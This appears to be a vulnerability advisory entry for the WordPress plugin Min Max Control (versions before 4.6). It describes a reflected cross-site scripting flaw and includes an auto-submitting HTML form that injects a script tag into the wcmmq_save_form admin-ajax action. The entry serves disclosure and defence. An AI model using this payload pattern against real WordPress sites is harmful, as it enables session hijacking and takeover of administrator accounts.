Lucene search

K
wpexploitAnimesh GauravWPEX-ID:04560BF1-676B-46FB-9344-4150862F2686
HistoryAug 21, 2023 - 12:00 a.m.

Min Max Control < 4.6 - Reflected XSS

2023-08-2100:00:00
Animesh Gaurav
29
reflected xss
min max control
form submission
vulnerability
malicious script

0.0005 Low

EPSS

Percentile

17.0%

Description The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

<body onload="document.forms[0].submit()">
    <form action="http://example.com/wp-admin/admin-ajax.php?action=wcmmq_save_form" method="POST">
        <input type="text" name="BB" value='"><script>alert(1)</script>'>
        <input type="submit" value="submit">
    </form>
</body>

0.0005 Low

EPSS

Percentile

17.0%

Related for WPEX-ID:04560BF1-676B-46FB-9344-4150862F2686